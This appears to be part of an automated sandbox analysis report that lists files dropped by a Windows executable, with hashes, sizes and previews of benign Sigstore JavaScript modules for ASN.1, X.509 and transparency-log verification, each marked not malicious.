              SHA-256:4C5C8E2E02D03B5DC5EB2E274539F69C56F162A472E8187124A29C2BA57532D2
              SHA-512:852EFCF72B80901E464FC54083ED07E40EA1756F1D7584E8808B21856109E0CD121EF9E28CA4655A502EF482BA755C1C903CFE6ACAA756B4927EDACE394140F7
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifyTLogSET = void 0;.const util_1 = require("../../util");.// Verifies the SET for the given entry against the list of trusted.// transparency logs. Returns true if the SET can be verified against at least.// one of the trusted logs; otherwise, returns false..function verifyTLogSET(entry, tlogs) {. // Filter the list of tlog instances to only those which might be able to. // verify the SET. const validTLogs = filterTLogInstances(tlogs, entry.logId.keyId, entry.integratedTime);. // Check to see if we can verify the SET against any of the valid tlogs. return validTLogs.some((tlog) => {. const publicKey = util_1.crypto.createPublicKey(tlog.publicKey.rawBytes);. // Re-create the original Rekor verification payload. const payload = toVerificationPayload(entry);. // Canoniuserze the payload and turn into a buffer for verification. const data = Buffer.from(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1233
              Entropy (8bit):5.017675147658535
              Encrypted:false
              SSDEEP:
              MD5:4CF381F6B69EC8FE429D038D34B3175D
              SHA1:4625B940353D4A5D877B5F944BD4BE6E9422AC57
              SHA-256:98C91EF67849E7A2883D49600D1E72A53FCFB183F9EF12F72EF118D9A1860DB3
              SHA-512:6EC70706647CFF0FFE1C0B34BB83C8C3470831AAF8CE106985EE40E58B17B0A70FDCF58467AC99F908AE1C298905681195F1F41CAA1001115283CAF380CEC11E
              Malicious:false
              Reputation:unknown
              Preview:"use strict";./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.Object.defineProperty(exports, "__esModule", { value: true });.exports.isCAVerificationOptions = exports.SubjectAlternativeNameType = void 0;.// Enums from protobuf-specs.var protobuf_specs_1 = require("@sigstore/protobuf-specs");.Object.defineProperty(exports, "SubjectAlternativeNameType", { enumerable: true, get: function () { return protobuf_specs_1.SubjectAlternativeNameType; } });.function isCAVerificationOpti
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):645
              Entropy (8bit):4.967461720655853
              Encrypted:false
              SSDEEP:
              MD5:BB69526011EDC361727C98B3E3650898
              SHA1:8240F2EE87F673CEE2CE365AD9B6B9EC7D58C23B
              SHA-256:A056BF1B66FA911D2BD18C108E685AF6A9FCC73CCE703241C992543C2FF8B132
              SHA-512:A0AA147E42DF1DFE88211574167D906F163833CACE52DD4A607B404326AC09F978299231853496071D6B0D2BCD9FE6DF2E1BB66CFAAC6C2740C8730F7D7F0032
              Malicious:false
              Reputation:unknown
              Preview:"use strict";./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.Object.defineProperty(exports, "__esModule", { value: true });.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3491
              Entropy (8bit):4.602193312247545
              Encrypted:false
              SSDEEP:
              MD5:7F9777E74EF22332540A9F9A7180EF53
              SHA1:507796C37297171E4A9BD01AF3FD9130D21EA6B2
              SHA-256:1FE071D107CC3CB7C6D772D2B8E2DEC0B37A927F3E5EC47E93C7E3BA1CD1C466
              SHA-512:195DE14E93BB91988D8DBD19D88813E9425D171B529C2375FA807C9A4B33165C7A61A8679519474C546A8586D68D69CBBDA3B74549D8DA241D6D4B787A7D0981
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.dump = void 0;.const tag_1 = require("./tag");.// Utility function to dump the contents of an ASN1Obj to the console..function dump(obj, indent = 0) {. let str = ' '.repeat(indent);. str += tagToString(obj.tag) + ' ';. if (obj.tag.isUniversal()) {. switch (obj.tag.number) {. case tag_1.UNIVERSAL_TAG.BOOLEAN:. str += obj.toBoolean();. break;. case tag_1.UNIVERSAL_TAG.INTEGER:. str += `(${obj.value.length} byte) `;. str += obj.toInteger();. break;. case tag_1.UNIVERSAL_TAG.BIT_STRING: {. const bits = obj.toBitString();. str += `(${bits.length} bit) `;. str += truncate(bits.map((bit) => bit.toString()).join(''));. break;. }. case tag_1.UNIVERSAL_TAG.OBJECT_IDENTIFIER:. str += obj.toOID();
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):859
              Entropy (8bit):5.027970637372676
              Encrypted:false
              SSDEEP:
              MD5:B1A78B39E3B60A44AD0C61F74F8DCFED
              SHA1:CA5370A49E2592A48459E4B90AF27096CE62D4D1
              SHA-256:31D1305E0AB546F5A2FEDD81F6F157F4102DAE3782220FD6E0E7AFB50B1A6B95
              SHA-512:7CA877EF5DDEB89BCBFFA2F83339848E586F81D00F1C6A2074B3175BD0E603248A95DED43976684C6BD3818961F843C4A04CA812E3E890FE6C8F59DEBF02368F
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.ASN1TypeError = exports.ASN1ParseError = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.class ASN1ParseError extends Error {.}.exports.ASN1ParseError = ASN1ParseError;.class ASN1TypeError extends Error {.}.exports.ASN1TypeError = ASN1TypeError;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):810
              Entropy (8bit):5.095969880995018
              Encrypted:false
              SSDEEP:
              MD5:7B91A1E7022CA426E5BC04ECEFC5D808
              SHA1:13AE7B502E0ECE465E1BDF5F63DEA5222A7FEE52
              SHA-256:07377C8DC320B991517DD832068C540A86D949A40563B233B07191621D7513D6
              SHA-512:E41C92A98387C7201BC11B845F8323183AE3B3F686D728CC4941E2E42010D54F17C78ED7B00786DFD04134AE9B46BF079D70A25E1023804F1C49EFAAC08CCF1B
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.ASN1Obj = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.var obj_1 = require("./obj");.Object.defineProperty(exports, "ASN1Obj", { enumerable: true, get: function () { return obj_1.ASN1Obj; } });.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2356
              Entropy (8bit):4.869308440534726
              Encrypted:false
              SSDEEP:
              MD5:A7AE798EB8F21436A85BD4F6D8F52EA9
              SHA1:1E922DB4EFCCE419A6D4DA5D075AE27CD1336B49
              SHA-256:9A5E19F68DADF52F61AFC4D3097D07B9DC9D61EB0CE3786254641DD39572D495
              SHA-512:C1B86C6F6D61724532253BB61B2E77CBE559F3BBFB45E392352221C80195E44A7CB242404F168B556F5ED35E56B831DACEC42A9C159A8759508DD31A426AD473
              Malicious:false
              Reputation:unknown
              Preview:"use strict";./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.Object.defineProperty(exports, "__esModule", { value: true });.exports.encodeLength = exports.decodeLength = void 0;.const error_1 = require("./error");.// Decodes the length of a DER-encoded ANS.1 element from the supplied stream..// https://learn.microsoft.com/en-us/windows/win32/seccertenroll/about-encoded-length-and-value-bytes.function decodeLength(stream) {. const buf = stream.getUint8();. // If the mos
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):5631
              Entropy (8bit):4.677288920371792
              Encrypted:false
              SSDEEP:
              MD5:D5174B8DBBC48FF00AD337B42E1B2456
              SHA1:2A1C0CD5B130B705C3E155A1E184E324F20F3734
              SHA-256:AD50D1E556E10AA366517BEC17FB4B980D1CE656E8F1670D499D4B31452C62B7
              SHA-512:704CD4D05D2C44303FEA0166289C6A22D97B23B79FBA3F9B23532C15CA2ADD3876FBAF2A389483359DA8EE45CFC50324EE723D06F74947931316562FC6227A57
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.ASN1Obj = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const stream_1 = require("../stream");.const error_1 = require("./error");.const length_1 = require("./length");.const parse_1 = require("./parse");.const tag_1 = require("./tag");.class ASN1Obj {. constructor(tag, value, subs) {. this.tag = tag;. this.value = value;. this.subs = subs;. }. // Const
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4648
              Entropy (8bit):5.0006430512404885
              Encrypted:false
              SSDEEP:
              MD5:CAE2A40A6214C80CA4E45C8A2CBEE747
              SHA1:EA75685DF5E389BDA25D9CC7F7EA68C3CCAF7F39
              SHA-256:5B3B60E7ED719DA2AC701474AF41686838126810C61675522D8418ACE60C2B12
              SHA-512:720E593912EB8EABBF73A2B3BBA1BE96DD65A33984563CF05C53D69C44F4CD2DD2F72B13B18E27A2A305D29C1DC8F8E61898620C526995302481B602A879DDB2
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.parseBitString = exports.parseBoolean = exports.parseOID = exports.parseTime = exports.parseStringASCII = exports.parseInteger = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const RE_TIME_SHORT_YEAR = /^(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})Z$/;.const RE_TIME_LONG_YEAR = /^(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})Z$/;.// Parse a BigInt from the DER-encoded buffer.// https://le
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):2919
              Entropy (8bit):5.146466333978252
              Encrypted:false
              SSDEEP:
              MD5:CECCEE978DE17BD36450EAEA9976DC3F
              SHA1:D9B1B2AABC04F9F56E43A402FED1249F03487587
              SHA-256:CC6B8481139E7F964E307EE3CE28FBC106D964F550E6553D934A5D3332A04202
              SHA-512:2F6736993FFEA8915F41AB057971A463398CC62E82D44F5D526C0DCD7364056A64A8EA9FD45411F31F22A4F93E19C704636EC0462EEC02E84F28CEA0961CA5AB
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.ASN1Tag = exports.UNIVERSAL_TAG = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("./error");.exports.UNIVERSAL_TAG = {. BOOLEAN: 0x01,. INTEGER: 0x02,. BIT_STRING: 0x03,. OCTET_STRING: 0x04,. OBJECT_IDENTIFIER: 0x06,. SEQUENCE: 0x10,. SET: 0x11,. PRINTABLE_STRING: 0x13,. UTC_TIME: 0x17,. GENERALIZED_TIME: 0x18,.};.const TAG_CLASS
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2139
              Entropy (8bit):5.017521266176413
              Encrypted:false
              SSDEEP:
              MD5:2A0B6A67E288836F14830F62B340035A
              SHA1:C4EF0FFC04F736AD5F7B2F9C9EA568F803544E4E
              SHA-256:E142BE32D6857A319DF3B8DF2BFF4E3DCC4601CB73D4CDC887F648BDF3A23709
              SHA-512:644E9FA9BF2861B844AD24AC906EB7657312488F8C3612EE3CEB540F2CFEB7242DE3A7181C4A5D0EE389DE3E3F97104B1675F04D1A7D3FF2C2C50380E0116D43
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.bufferEqual = exports.randomBytes = exports.hash = exports.verifyBlob = exports.createPublicKey = void 0;./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const crypto_1 = __importDefault(require("crypto"));.const SHA256_ALGORITHM = 'sha256';.function creat
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):997
              Entropy (8bit):5.1615179155012925
              Encrypted:false
              SSDEEP:
              MD5:CF06887D64DCCDD512B89DC848911418
              SHA1:E44CFF0C4A082EEFAF52EF6C08153F4F4AEE4F89
              SHA-256:4608AF71AB65F4F496951369EFE797F057299195E339CD4D3B1B88EEB7E1E484
              SHA-512:1C56069D4D07ADD3A396D2CE083BDBABEC949BDE42328BDDF6686FDCCE5D8BF2055090E1D68549F5A3B7D85CE12EC72CBCD066600F353C90315A89650428A137
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.preAuthEncoding = void 0;./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const PAE_PREFIX = 'DSSEv1';.// DSSE Pre-Authentication Encoding.function preAuthEncoding(payloadType, payload) {. const prefix = Buffer.from(`${PAE_PREFIX} ${payloadType.length} ${payloadType} ${payload.length} `, 'ascii');. return Buffer.concat([prefix, payload]);.}.exports.preAuthEncoding = preAuthEncoding;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1779
              Entropy (8bit):5.21361725265442
              Encrypted:false
              SSDEEP:
              MD5:FE9122260BB2BD60D54935F5C774132D
              SHA1:50E1EECAE1DB9D9707B375FCDBD8F2B17BE9D7F4
              SHA-256:58FE3D4E0893DA45687514C75038A88AD7E62086A5487F610C62164F5A247C8D
              SHA-512:E054EA92AA5FE06FE11BAEFA5BD78066FBCE6221E0C39F1F91651E45AE612A6D75D7139D7DDAF3DCAA07517B98A3CC84F1EDB69924EDA467098710BF02E204D5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.base64URLUnescape = exports.base64URLEscape = exports.base64URLDecode = exports.base64URLEncode = exports.base64Decode = exports.base64Encode = void 0;./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const BASE64_ENCODING = 'base64';.const UTF8_ENCODING = 'utf-8';.function base64Encode(str) {. return Buffer.from(str, UTF8_ENCODING).toString(BASE64_ENCODING);.}.exports.base64Encode = base64
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2073
              Entropy (8bit):5.088353395454537
              Encrypted:false
              SSDEEP:
              MD5:A7EDEFA723A7750B0006921BB47F915C
              SHA1:94B65DBF8EE3C0E8E1A96E20EDB413C8A70D5A28
              SHA-256:C23AE19CEF27C42179E63FFF38485FCA67967EF9A81198DD1A22662E2CB477C5
              SHA-512:E29429E491787CBECA9D9BC9CD55D0A4EA85802B3D8169B0C97951F27A2CE13B4384B4A2E21DB874E471DC4BC351119899E3247423C176EB65F3A84902DCCC46
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1615
              Entropy (8bit):5.120873059904084
              Encrypted:false
              SSDEEP:
              MD5:8C55B55D66D25413FAF8673016008B37
              SHA1:A4FF2F9A3E29A19FA14DCD33AFB1062C3B73B08A
              SHA-256:895BABB75E6BEE72C5505CEA3AC224C48E608CFA2C94DA70308A8F281A8EECA0
              SHA-512:28C5FAE6ECD284CB2DCACFF8E2D094BE30FFB22B7C85BA929B1CB823FA377E96D635E3BFC22F5AB4AEDFD8110B1787FC55AE71A7A67FD9AF945D8CE0FE48B36C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.fromDER = exports.toDER = void 0;./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const PEM_HEADER = /-----BEGIN (.*)-----/;.const PEM_FOOTER = /-----END (.*)-----/;.function toDER(certificate) {. let der = '';. certificate.split('\n').forEach((line) => {. if (line.match(PEM_HEADER) || line.match(PEM_FOOTER)) {. return;. }. der += line;. });. return
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3588
              Entropy (8bit):4.647313106134328
              Encrypted:false
              SSDEEP:
              MD5:35C7931AB5B5429DDCEA66C26BA8C282
              SHA1:5EE4AF23652708E5B669752396950BE5ADB8193F
              SHA-256:CBFCCADAC4ECEECE00345F26933F9F9AA6ECA21DFA7A6BF7418387486EB31690
              SHA-512:FE542EFC78C229EDAF0E301A3E0ACB4052942DCED2BCB33531F0E067618035082755B566025BA6E64F4002291CDB4607E6AD29FB19893140F7C5F96B5C29A9CA
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.ByteStream = exports.StreamError = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.class StreamError extends Error {.}.exports.StreamError = StreamError;.class ByteStream {. constructor(buffer) {. this.start = 0;. if (buffer) {. this.buf = buffer;. this.view = Buffer.from(buffer);. }. else {. this.buf = new ArrayBuffer(0)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):7438
              Entropy (8bit):4.778765854324214
              Encrypted:false
              SSDEEP:
              MD5:A1531A6C51299E70EBE614A57683BF04
              SHA1:D9E878E0C1C091C9B4F115B9EA5CD77CCBE53EC8
              SHA-256:FF6BDCE2042AD64CFF53800019EA29EA7B61AE6B753CA5B0CA2E269C9BBE4DBE
              SHA-512:5A59483D02CB9AD5170CCD1A952FE056132B8F844C43F43F76CECE1E4ECF8A27DF283453025549420862022AADB76C47C23E0C513A222497180930C224FE47CB
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):10169
              Entropy (8bit):4.910665402374643
              Encrypted:false
              SSDEEP:
              MD5:07D415546517C3C41508AE0E8BF38AB8
              SHA1:2EFEB69ED14A7EE1110360CC759F652776DD51CF
              SHA-256:AF4158B432285A1DFADAD067FD30D44ED90E3E640FD26BD292AFAA2F609F895A
              SHA-512:554373E5748238D49625B2411B4864B4FA1E04A8B0EBCD8C245F5DECDE187A10A5BEFF19B9E81BF19C12B42C26D164BB6E1885E9FF1ADB2BCBAF209E7FE00660
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.x509Certificate = void 0;.const util_1 = require("../util");.const asn1_1 = require("../util/asn1");.const stream_1 = require("../util/stream");.const ext_1 = require("./ext");.const EXTENSION_OID_SUBJECT_KEY_ID = '2.5.29.14';.const EXTENSION_OID_KEY_USAGE = '2.5.29.15';.const EXTENSION_OID_SUBJECT_ALT_NAME = '2.5.29.17';.const EXTENSION_OID_BASIC_CONSTRAINTS = '2.5.29.19';.const EXTENSION_OID_AUTHORITY_KEY_ID = '2.5.29.35';.const EXTENSION_OID_SCT = '1.3.6.1.4.1.11129.2.4.2';.// List of recognized critical extensions.// https://www.rfc-editor.org/rfc/rfc5280#section-4.2.const RECOGNIZED_EXTENSIONS = [. EXTENSION_OID_KEY_USAGE,. EXTENSION_OID_BASIC_CONSTRAINTS,. EXTENSION_OID_SUBJECT_ALT_NAME,.];.const ECDSA_SIGNATURE_ALGOS = {. '1.2.840.10045.4.3.1': 'sha224',. '1.2.840.10045.4.3.2': 'sha256',. '1.2.840.10045.4.3.3': 'sha384',. '1.2.840.10045.4.3.4': 'sha512',.};.class x509Certifi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):5576
              Entropy (8bit):4.84421102132842
              Encrypted:false
              SSDEEP:
              MD5:3FD120F5F78486E52A20411FDD8C1444
              SHA1:0D2F1E448D977DB5BA9204EDD8521D06E467C925
              SHA-256:E8ECBC88079CD11125478F4E9E1482EAB796B8C17180A2C639F0C6065D64F5EC
              SHA-512:9FE13403FD19E4980B02ABC70D11C1C18347FD78A0C3724AE33B8F108BF9DA44E51FD82B40DCD8B9AB325DA390DBE3AF06323C5469F7AFEE3F8CB0F47402AF0C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.x509SCTExtension = exports.x509SubjectKeyIDExtension = exports.x509AuthorityKeyIDExtension = exports.x509SubjectAlternativeNameExtension = exports.x509KeyUsageExtension = exports.x509BasicConstraintsExtension = exports.x509Extension = void 0;.const stream_1 = require("../util/stream");.const sct_1 = require("./sct");.// https://www.rfc-editor.org/rfc/rfc5280#section-4.1.class x509Extension {. constructor(asn1) {. this.root = asn1;. }. get oid() {. return this.root.subs[0].toOID();. }. get critical() {. // The critical field is optional and will be the second element of the. // extension sequence if present. Default to false if not present.. return this.root.subs.length === 3 ? this.root.subs[1].toBoolean() : false;. }. get value() {. return this.extnValueObj.value;. }. get valueObj() {. return this.extnValueObj;. }. get e
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):4147
              Entropy (8bit):4.638596284153553
              Encrypted:false
              SSDEEP:
              MD5:1D5FD601E6558752F55C4104B24007F0
              SHA1:DAAC7261E893BA7A2B843A46A9CB9D5723A0EDAA
              SHA-256:6E8359D95ADC1AC62C9045D3AF6FFA68879A4D9DE36E56CB4DCB33E2AA0AC17D
              SHA-512:219722BB823397D70F6EA85F3FA66B2B7B5C6D5B5E520ADCB25581F60717E41AFDF4463AB63AABC701F9597B524162403745A45BAB637FA678F04DCA50DB067E
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.SignedCertificateTimestamp = void 0;.const util_1 = require("../util");.const stream_1 = require("../util/stream");.class SignedCertificateTimestamp {. constructor(options) {. this.version = options.version;. this.logID = options.logID;. this.timestamp = options.timestamp;. this.extensions = options.extensions;. this.hashAlgorithm = options.hashAlgorithm;. this.signatureAlgorithm = options.signatureAlgorithm;. this.signature = options.signature;. }. get datetime() {. return new Date(Number(this.timestamp.readBigInt64BE()));. }. // Returns the hash algorithm used to generate the SCT's signature.. // https://www.rfc-editor.org/rfc/rfc5246#section-7.4.1.4.1. get algorithm() {. switch (this.hashAlgorithm) {. case 0:. return 'none';. case 1:. return 'md5';. case
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):7456
              Entropy (8bit):4.374239417077828
              Encrypted:false
              SSDEEP:
              MD5:5E5CD4504262E8116D9B637AD6EB7D91
              SHA1:9D009B314DADBCB85EDDC1E114A81139477D65FC
              SHA-256:70DA6D1315296D95EF5CBEDF6F71A7E52B55D1AFD37B3BEC382C0BA28C3D2ACD
              SHA-512:ACDA8E2CC6E8959BE0BEE729B7BC5EBA3C3F9689120BD6A6949C272A0ECD579C3C2CF7F0DCFBD7083C84B4EA6C0016CE165F1FFEFE020CBCABF8AF5DF83642FF
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifyCertificateChain = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../error");.function verifyCertificateChain(opts) {. const verifier = new CertificateChainVerifier(opts);. return verifier.verify();.}.exports.verifyCertificateChain = verifyCertificateChain;.class CertificateChainVerifier {. constructor(opts) {. this.untrustedCert = opts.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
